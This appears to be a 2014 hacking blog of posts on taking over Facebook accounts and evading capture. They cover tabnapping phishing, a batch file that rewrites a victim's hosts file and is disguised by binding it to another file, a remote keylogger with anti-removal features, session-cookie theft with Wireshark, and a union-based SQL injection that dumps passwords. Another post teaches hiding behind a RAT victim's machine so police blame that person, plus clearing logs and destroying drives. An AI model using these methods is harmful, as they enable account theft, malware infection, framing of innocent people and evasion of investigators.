Tuesday, 2 September 2014

Hack Facebook Account by Tab Napping Method

 


Hi Friends , Today I am telling about "How to Hack facebook account" by using Phishing and Tab Napping techniques.So first of all I am telling about Phishing and Tab Napping.



Phishing: 




Phishing is technique through which we can hack account of any website.It is just a copy of website and you send it to your victim and when he/she login his/her password will be stored in your password website file.For Example you want to hack someone facebook account then you first of all you need a facebook phishing page (this is just like facebook login page) and upload it to your website and send it to victim when he/she login with his/her account then his/her password will be send to or save to your website password file.



Tab Napping:



 Tab Napping is new hacking trick through which you can't directly hack account and you will be using phishing method with tab napping then you can hack account. Actually Tab Napping is a script which you put into a site/blog and when the user visit your website/blog and read your article or play game or watch video, when user goto other tab in browser which contain other website like youtube,google etc and came back to your website then  your website will be redirected to the phishing page and telling them to login with facebook/gmail/yahoo account to continue.When user enter login information he/she will be back to your page and user password will be send to you.

So lets see how to hack facebook account using tab napping trick.


Steps:

1) First of all you have a web hosting (website) and if you don't have your own website then create Free website with following website :
www.000webhost.com 



www.host1free.com 



www.my3gb.com 
or you can search on google and create an account.

2) Now download the script and phishing pages from here: http:/www.mediafire.com/?0zrp565h8v90jbe

3) Extract it and you will see the files and folders like below:



1 (2)





4) Upload all the files and folders to your website.
when you upload it's look like





2



5)The website contain a game and send your website address(your tab napping website where you upload all the files) to your friend or anyone else whose facebook account you want to hack and tell him/her that if your are intelligent or smart or say anything else then play this game and win it.
The website look like this:



 3



Actually the game is very dificult and he/she will not win in less time and  he/she will goto another tab in browser like facebook,google,youtube ,yahoo etc and when he/she came back to the website , it will be automatically redirected and saying them to login with facebook account to continue.



 4



 When your victim log in with facebook account then her/his password will saved in your website and he/she will be redirected to main game page.
Now just open www.your-website.com/fb/password.html and you will see the email and passwords.



The password page will look like this



 5


Note: This is illegal and is for educational purpose only. Any loss/damage happening will not be in any way our responsibility.
Read more...

Desktop Phishing Tutorial - Hack Facebook Accounts


 
Desktop Phishing is another advanced type of Phishing attack, In my previous post Desktop Phishing -Introduction i explained the idea and working behind this phishing attack, In this article i will explain how you can use this method to hack Facebook book , Gmail accounts .

 


This phishing attack is a bit advanced and if your a newbie i would recommend you to read the following articles first


Desktop Phishing Tutorial - Hack Facebook Accounts
Concept Behind The Hack :
Hosts file is a computer file used in an operating system to map host names to IP addresses. Host file used to play a large role before the Domain Name System (DNS) came into existence. A hosts file basically controls how your browser finds websites.



You can use host file to map any word or domain to an ip address or to another domain. For example if we add 

74.125.236.84 www.facebook.com

To the host file what will happen is that when you type Facebook.com in your browser it will open google.com instead of facebook.com this is because (74.125.236.84) is Google's Ip, So the browesr will take it blindly So if a attacker is abel to add his Ip address (where he Hosts the phisher page ) Victim will be redirected to the attackers phishing site

What makes this attack so successful is the victim will not Know since the URL only remains facebook.com
What Hackers Dont Teach You ?
I see many tutorials on the net on Desktop Phishing but Most of the tuts wont't work because of following things


 

  • Now days every one has a dynamic IP address (ip changes every time when you restart )

  • Now all most all computers are behind a Router, So we have to port forward our web server in order to access it . This is a little confusing for newbies


 

But in this tutorial i will explain how you can over come all these problems

How To Over Come This Problem ?
We can overcome the above problems by using a static VPN , With a VPN you will have a static Ip address and you need not port forward your webserver


Demonstration
Things You Require :-

1. Phisher Page - You can download Facebook Phisher page from Here
(I've added an extra page to make it more realistic, the victim will get a message saying Facebook is blocked by your isp)

2. Web server - You can use wamp or xammp , i would recommend you to use xammp, i have written a tutorial on how you can install , use Xammp kindly refer the article for more details


3. A static VPN - I will Use proXPN VPN for this Tutorial but i recommend you to use Strong Open VPN as it is very stable you can download it from Here 

Procedure:-

1. First Download and install xampp on your PC, Start Apache and Msql services


 
1

 

2. Download the Facebook Phisher page From the link given above, Place all its contents in the ht docs folder which should be under Xammp (place were you installed xampp)


 
21 (1)

 

3. Install ProXPN VPN or any other static VPN, i recommend you to use Strong Vpn as it very stable and gives you a static IP Once you install and run it, you will get a static IP (vpn)


 

4. Now we have to replace some text in the victims Host file which is at C:\windows\system32\drivers\etc ,You can do this by many ways either by using a SFX archive or using a batch file for this tutorial we will use a batch file to accomplish the job


@echo off
echo 172.X.XX.X.X www.facebook.com >> C:\windows\system32\drivers\etc\hosts
exit
Replace "172.X.XX.X.X" with your IP (vpn ) address, Finally save it as Save it as Something.bat

5. Now to avoid suspicion you can Bind the batch file with a legitimate file, Kindly refer the Binders tutorial for more info

6. Now send the file via email or upload the file to a site and ask the victim to download the file , After the victim downloads and clicks the file, his host file will be replaced ,So now when ever the victim enters facebook.com He will be redirected to our Phisher Page, But the URL will remain as Facebook.com


 
4

 

 

 
5

 

 


 

 

To see all the victims credentials and Password open newly created log.txtfile which is under ht docs folder


 
6

 

 

 

 
Note: This is illegal and is for educational purpose only. Any loss/damage happening will not be in any way our responsibility.

Read more...

Monday, 1 September 2014

Hack Facebook Accounts – Download UD Remote Keylogger

 


Today I am here with new UD Keylogger which will help you to "Hack Facebook Accounts" or any other accounts. This is the latest version ofkeylogger with many facilities and features. Though now only thiskeylogger is released at it came from FUD to UD. Confused I will make you understand.



Ud Keylogger





What is the Difference in FUD and UD Keylogger ?

As the name indicates that FUD Keylogger is fully undetectable keylogger from any antivirus in the world. And UD Keylogger mean its only undetectable keylogger and though few antivirus can catch it as virus.



Hack Facebook Accounts – Download Remote Keylogger



 Here I am going to present a New Remote Keylogger which has the power to hack facebook accounts and to record all the key strokes typed.





0cd_909_580_580-ardamax-keylogger-remote-screenshots



Features Of new UD Remote Keylogger: -




  • UD - 3/33

  • You Can Use Gmail Account to get the logs

  • Add To Start Up also included

  • It also Kills Task Manager

  • Automatically Hides the virus after infecting the victim

  • Also Disables Registry Editing

  • Stops victim From Ending Your Keylogger's Process

  • New Icon Changer

  • File Binder

  • With Fake Error Message

  • Includes Time Interval







How To Use This Remote Keylogger for Hacking Of Facebook Accounts




  • Download The Remote UD Keylogger and extract the folder to desktop

  • Open the Remote keylogger and enter new created Gmail account username and password

  • Select the other settings as you need and donot forget to change Time Interval to 2 min

  • If you want then use Icon changer, File Binder, etc and then click on Build Server

  • Now upload this keylogger to file sharing sites like megaupload.com, mediafire.com

  • Now send Server to victim by any mean and when he/she will click on server, he will be hacked

  • Now you will get the victim typed keystroke which also includesHack Facebook Account Password

  • You can hack any account by this Remote Keylogger





So you are done, I am sure that you will enjoy this Remote Keyloggerand if you have any problem then please do comment and share your problem. I am always ready to help you all.





Note: This is illegal and is for educational purpose only. Any loss/damage happening will not be in any way our responsibility.


 
Read more...

HACKING FACEBOOK USING COOKIE STEALING AND SESSION HIJACKING


Today we are going to discuss how any Hacker can Steal Facebook Cookies to Hijack Current User’s Session. This is also called Man In the Middle Attack.
We’ll use WireShark Network Protocol Analyzer. It can be used for Capturing Packets and cookies within a Network i.e LAN, WiFi etc.

Today I am gonna Steal My Friend’s Facebook Cookies who is sharing my WiFi Network.:p .



WHAT IS FACEBOOK’S AUTHENTICATION COOKIE? HOW IS IT VULNERABLE?


Cookies, HTTP/HTTPS Cookies are helpful for WebSite for Storing User Specific Data in User’s Browser itself for reducing Overhead on Server round trips.However Cookies can also get you in trouble if someone is able to steal it from your system.Facebook uses “datr” Cookie Authentication mechanism.Attacker will use Your sessions cookies and inject in Browser. Browser will redirect him to your account State at that time.



HACKING FACEBOOK USING COOKIE STEALING AND SESSION HIJACKING




HOW TO USE WIRESHARK FOR CAPTURING COOKIES


WireShark is a Packet Sniffer which Sniffs a Network and captures Packets being Transferred, So it also captures Session Cookie Packets being used for any Website Say Facebook, Gmail, Hotmail etc. Therefor it’s a very popular tool among Hackers for Stealing Victim’s Cookies and hijacking their logedin sessions.
We can use this tool for any kind of Network, right now i am going for Wireless network.


so, let’s see how it works…




  • Download Wireshark Protocol Analyzer(latest version Preferred).

  • Install and run. Go to Capture -> Interfaces.


Network_Interfaces




  • It will open Interface window containing All Interface Supported. You can check Active interfaces by seeing on packets. If they are updating it means network is active. As in snapshot below i am going for Wireless Network Connection. Check out this network and click Start.


 Wireless_Nwtwork (1)




  • Packet Capturing will start. Now we have to set Filter for Our desirable packet.i.e Cookie for Facebook.

  • Click on Analyze-> Display Filters. There Input FilterName as Http.cookie and FilterString as http.cookie contains datr.Then push Apply. Now Filter has been set. Just wait for 10 mins it will Fetch and display cookie containing “datr”.


wireshark_filterstring

  • After Some time you will find Cookie Packet containing datr value in the result window.



  • Now Right Click Node Filtered for “HTTP Cookie datr”. go to Copy -> Bytes -> Printable text only.


 copying-packet-value.-300x147




  • Put in a notepad copied text and select value like :

    Cookie: datr=ZNHCUlHbFOue6NKOWLQaRUgvdsabsacg789





    • Now we’ll need some agent for Injecting this Cookie value to browser. This we’ll do via cookie Injector Script Download here. And A Chrome Plugin TemperMonkey (if you are using chrome), Greasemonkey for Mozille.Script will be run in browser via Plugin added.

    • Now Open Plugin and Script Code to it. Once it’s added to Plugin. Open Facebook Login Page in a new window.

    • Now Press ALT+C . It’ll Call Cookie Injector dump Window. There you Put the Copied Cookie Value.and press ok.



    • Cookie has been Injected to browser. Now just Refresh the page & you’ll be logged in to Victims Account.




facebook_page-300x154

Points to Note:
This method of Facebook Cookie Stealing and Hijacking won’t work for HTTPS end to end encryption enabled protocol as Cookies will be Encrypted. So won’t work.


 

 


 WARNING –



EVERYTHING YOU DO WITH THIS TUTORIAL DO IT AT YOUR OWN RISK. USE IT FOR EDUCATIONAL PURPOSES ONLY. I’M NOT RESPONSIBLE FOR ANYTHING YOU DO WITH THIS TUTORIAL!

Read more...

Stay 100% anonymous on the internet







vpn




Today i will teach you how to stay 100% anonymous on the internet



WARNING - EVERYTHING YOU DO WITH THIS TUTORIAL DO IT AT YOUR OWN RISK. USE IT FOR EDUCATIONAL PURPOSES ONLY. I'M NOT RESPONSIBLE FOR ANYTHING YOU DO WITH THIS TUTORIAL! (A) 
__

First i would like to say...

To all the people who say, that's impossible, if the government wants you they catch you. 

No that's not right. 
The people who got caught are stupid people. People who brag about what they were doing. Tell it to friends or write it on forums. Remember... If the police can't trace you they will try to dox you.

If you brag about what you are doing they can just ask Admin's for your IP, because most sites and forumns log your Ip's.
__

Things you need:




  • Truecrypt.

  • Smac.

  • Wireless Network Adapter.

  • nVpn.

  • Vps.

  • Another nVpn account.

  • Socks5 for use victims IP adress. One slave on your RAT.

  • A list of working proxies.

  • A closed mouth.

  • A home.



__



Truecrypt




You should first of all encrypt your drive so not even the cops can acces it and see what your were doing if they find your HDD.

There are many tuts on how to encrypt your HDD with truecrypt.
__



Smac




Smac is a powerfull tool that can change your mac address.

Use it! It's reduce the chance of getting caught. 

There are way to many tuts on how to use it.
__



Wireless Network Adapter




Wireless network adapter change your mac addres, so if they found out your real mac address after you spoofed it with smac, they will just get the mac adress of your usb adapter.
__



nVpn




nVpn is the best vpn for hacking on the marked.

What a VPN does is it connect you to a Vitural Privat Network that is encrypted. 

So if they trace you they will get nVpns IP not yours.

They say they don't keep logs, but i'm sure they do.

But they delete after a period of time.
__



VPS




VPS stands for a Virtual Privat Server and what it do is that you connect to a Virtual machine, so you don't have any hacking shit on your machine and agian, it's change your IP.

__



Socks5




You need one slave from your RAT to use his IP.

Socks5 mean that your IP change to your victims IP.

So instead of you, the cops end up to him.

Remember, if this one.. You can get it to look like a person of your choice do it :-)

Of course when he say he didn't, they will scan his PC for rats.. and then they will go a step down.. To your VPS :-)
__



Proxies




Proxies change your IP in your browser and show another IP instead of yours.
__



A closed mouth



Alltime keep your mouse closed! If you brag about what you have done, you will get caught.

They find you if you brag! Be sure about that. Even your friends will tell it to their friends.
__



What should i do then i got this?




First thing you need to do is to get slave rat, you could use are target person so the cops will end up to him.

You should have encrypted your PC with truecrypt before doing anything else.

But first you get down to the Internet Cafe with Wireless Network.

When you are on the Internet Cafe you put your Usb Adapter in and spoof it's mac address with smac.

Then you are there you connect to your nVpn. Then you connect to your VPS and connect to another nVpn account.

Then you should forward your ports on nVpn that is installed on your VPS.

Then you should choose a target from your rat list, right click on him and use him as socks5.

After this you make a proxy chain. A proxy chain is a long list of working proxies so when they find your first proxy they just get to the next and this go on and on agian and agian.

(The idea with a proxy chain is that they give up or the proxy has deleted logs before they get to the last one.)

Keep your mouth closed. If you brag, they find you, be sure about that.

Go home.

And if you do something big so they go through all this they will just end up on the internet cafe with you home and watching TV.

A good idea would be to take your HDD and your USB adapter out, run a magnet over the HDD and smash both USB adapter and HDD. Then burn it or something to the last. So there is nothing there can give you away if they come to your home.
__



Tips n' tricks



  • Just a little tip... A good idea would to not smash your PC at the Internet Cafe because that would maybe get a little attention and don't burn it there too..

  • You can of course buy more nVpns, proxies and vps to get more secure etc.. Like -> nVpn -> vps -> nVpn -> Socks5 -> vps -> nVpn -> socks 5 -> Proxy chain -> Do your dirty job.

  • Really, you don't even need all this, all this do it piss the cops off with after a long searching ending up on a internet cafe and a smashed computer. I'm not 100% sure about this.. But i think you just can go to the internet cafe, do your job, leave, smash PC and speciel the HDD! And that's it. But for being on the secure side so they have harder to find you. But if you follow my TUT it's will be a pain in the ass for the cops to find the internet cafe with no... you!

  • You can use smac every time you connect to a new VPS for being double secure.

  • If you use proxies that your country is unfriendly with, the cops with have a harder time to get the logs.

  • Don't log on facebook or any other things that can lead to you then you are logged in with your vpn, vps, socks5 or proxies.

  • Because then they just ask facebook for maybe that IP adress and then they tell the the cops the latest account logged in that IP.

  • Not use your real info then buying nVpn, vps, your RAT or buy proxies.

  • Don't do this at your main PC, but a low price one if you want the smashing part.

  • A good idea would be to take your HDD and your USB adapter out, run a magnet over the HDD and smash both USB adapter and HDD. Then burn it or something to the last. So there is nothing there can give you away if they come to your home.



__

I hope this tut helped some people to stay anonymous on the internet.






 
Read more...

Secure your hacking

 

 

vpn-02


 

1) How hackers get caught.


 

- First stuff that gives you away are "LOGS".
You need to know how events, application, and system logs work. If you dont, you can be easily caught!
The shell history will expose your actions.
Another giveaway is leaving a “:wq” in /var/log/messages or binarys.


 

- Your laziness will take you into problems.
NEVER HACK FROM HOME! Take your time, and go to net cafe or anywhere else apart from home. Logs will take you down!


 

- The code that you run on system will take you down. If you compile the code on target, libraries will give you away!


 

- If your victm, notice, that he is maybe hacked, or something is wrong.. He will ask from his ISP for IP logs, and if you dont use VPN, or if you hack from home, they will hunt you down.


 

- Thing, that takes you down 100% is BRAGGING. It is common problem of beginning hackers. They like to brag, to earn respect and reputation but NOT KNOWING that is the matter of minutes, hours mby days when they will be caught.
*Don't use hotmail. CIA Owns it.


 

2) Hiding and Securing you as "Hacker"-


 

Temporary guest accounts, unrestricted proxy servers, buggy Wingate servers, and anonymous accounts can keep hackers carefree.


 

*A young hacker is less likely to know all the little things that an expert hacker might know. Besides, the young hacker may be trying to impress others - and get a little careless about covering his tracks. This is why younger hackers are often caught.
*An older hacker, on the other hand, will rarely leave any tracks. They know how to use their slave's computers as a tool for a launching place to get into another computer.


 

There will always be hackers, and there will always be hackers in prison.


 

* DESTROY LOGS, REMOVE ALL YOUR TRACKS!


 

* DO NOT HACK AT HOME! USE VPN THAT SAVES NO LOGS!


 

HOW TO REMOVE YOUR SYSTEM LOGS:


 

Choose Start > Control Panel.
Double-click Administrative Tools, and then double-click Event Viewer.
In either pane of the Event Viewer window, right-click System and then select Clear All Events.
To save the current system log, click Yes when Windows returns the message, "Do you want to save 'System' before clearing it?", enter a file name for the saved system log file, and then click Save.


 

Virtual Private Network - VPN
1) I will recommend you to use proXPN.
It is VPN that do not store logs.


 


 


Note:



All information on this forum is for educational purposes only.


WE are not responsible for any attacks that are carried out on networks, websites or servers.





 
Read more...

Friday, 29 August 2014

Union Based SQL Injection

 


SQL Injection is defined by


"The act of entering malformed or unexpected data (perhaps into a front-end web form or front-end application for example) so that the back-end SQL database running behind the website or application executes SQL commands that the programmer never intended to permit, possibly allowing an intruder to break into or damage the database."



1) Find a site that Uses PHP. It should end in (ex.) …php?id=... or …php?p=… (etc.) Then type in the end (or before the last number) ‘. (Single Quote)


ex. http://www.mysite.com/game.php?id=1′;


If you get an error, you may proceed. (Means that the Site is Vulnerable!)


2) Erase the single quote you typed before, and type at the end order by 1– and the number shows the number of the tables that the database of the site has.


ex. .com/game.php?id=1 order by 1–(It shouldn’t get any error…)


3) Continue typing numbers (2,4,5,7 etc…) until it get an error. The last number that doesn’t get error is the number of the tables that the Database has!


ex. our site has 4 tables when: 
id=1 order by 5– (gets an error)
id=1 order by 4– (doesn’t get error) – So, the number of tables the Site’s database has is 4!


4) this (in our example) will display the table that are vulnerable.
union all select 1,2,3,4–


ex. http://www.site.com/game?id=-1 union all select 1,2,3,4–


(You should see many Numbers at many different areas of the page. – These numbers are the numbers of the vulnerable tables)


5) to find the version of the SQL type @@version instead of the vulnerable table number that is at the top (ALWAYS AT THE TOP). 
union all select 1,2,@@version,4–


ex. id=-1 union all select 1,2,3,@@version– (if the 3rd table is vulnerable and is at the top – if it is NOT the one that is at the top of the other numbers, the attack will not succeed!)


You should see the MySQL version of the Site. It should be 5.+. If it is less than 5, we need other methods to extract information.


6) to display Table Names type:


ex. union all select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database()–


(You see that the SQL Command is inserted at the vulnerable table we got at the “Union all Select” Statement – in our example ‘4‘) — Don’t freak out if it is difficult for you to learn the commands! Take notes and you will learn them after a while…


7) To display the Collum Names we type:


ex. union all select 1,2,3,group_concat(collumn_name) from information_schema.collumns where table_name=CHAR(117, 115, 101, 114, 115)–




The CHAR() is a MySQL Function. You can get the HackBar Add-On for Firefox that can convert a string (like ‘users’) to the appropriate format!


The CHAR() contains Numbers which are the converted format of the Table we need. In this example, “users”




8) To display the collumns we want (let’s say “username” and “password”) from a table (let’s say “users”) we type:


ex. union all select 1,2,group_concat(username,0x3a,password),4 from users–


username: collumn to display
password: collumn to display
0x3a: HEX Character: says the browser to display the info like this: user:pass 
users: table to search



NOTE: The passwords are usually in MD5 hash encryption (or SHA-1). Use a Service to unhash it! Like: 
http://www.md5decrypter.co.uk/


That’s it! This was the Union-Based SQL Injection!




Note:



All information on this forum is for educational purposes only.


WE are not responsible for any attacks that are carried out on networks, websites or servers.



 
Read more...